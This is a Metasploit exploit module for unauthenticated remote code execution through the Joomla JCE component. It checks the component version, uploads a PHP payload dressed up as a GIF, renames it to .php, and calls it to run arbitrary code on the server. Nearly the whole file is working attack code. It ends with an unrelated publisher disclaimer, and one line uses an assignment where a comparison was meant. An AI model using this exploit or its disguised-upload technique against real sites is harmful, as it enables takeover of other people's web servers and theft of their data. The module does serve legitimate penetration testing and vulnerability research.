##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Component JCE File Upload Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the JCE component for Joomla!, which
could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
request, a remote attacker could exploit this vulnerability to upload a malicious PHP
script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
1.5.26.
},
'Author' =>
[
'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['BID', '49338'],
['EDB', '17734']
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => 'Aug 2 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
], self.class)
end
def get_version
# check imgmanager version
@uri_base = normalize_uri(target_uri.path.to_s, 'index.php')
@vars_get_base = {
'option'=> 'com_jce',
'task' => 'plugin',
'plugin'=> 'imgmanager',
'file' => 'imgmanager'
}
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'GET',
'version' => '1.1'
})
version = nil
if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
version = $1.nil? ? nil : $1
end
return version
end
def check
version = ( get_version || '').to_s
if (version.match(%r{1\.5\.7\.1[0-4]?}))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def upload_gif
# add GIF header
cmd_php = "GIF89aG\n<?php #{payload.encoded} ?>"
# Generate some random strings
@payload_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11)
parms = {'method'=> 'form'}
parms.merge!(@vars_get_base)
# POST data
post_data = Rex::MIME::Message.new
post_data.bound = boundary
post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data = post_data.to_s
res = send_request_cgi({
'uri' => @uri_base,
'vars_get' => parms,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i)
print_good("Successfully uploaded #{@payload_name}.gif")
else
print_error("Error uploading #{@payload_name}.gif")
return :abort
end
return :success
end
def renamed?
# Rename the file from .gif to .php
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"
print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")
res = send_request_cgi(
{
'uri' => @uri_base,
'vars_get' => @vars_get_base,
'method' => 'POST',
'version' => '1.1',
'data' => data,
'ctype' => 'application/x-www-form-urlencoded; charset=utf-8',
'headers' =>
{
'X-Request' => 'JSON'
}
})
if (res and res.code == 200 )
print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
return true
else
print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
return false
end
end
def call_payload
payload = "#{@payload_name}.php"
print_status("Calling payload: #{payload}")
uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'version' => '1.1'
})
end
def exploit
return if not check == Exploit::CheckCode::Vulnerable
if upload_gif == :success
if renamed?
register_files_for_cleanup("#{@payload_name}.php")
call_payload
end
end
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information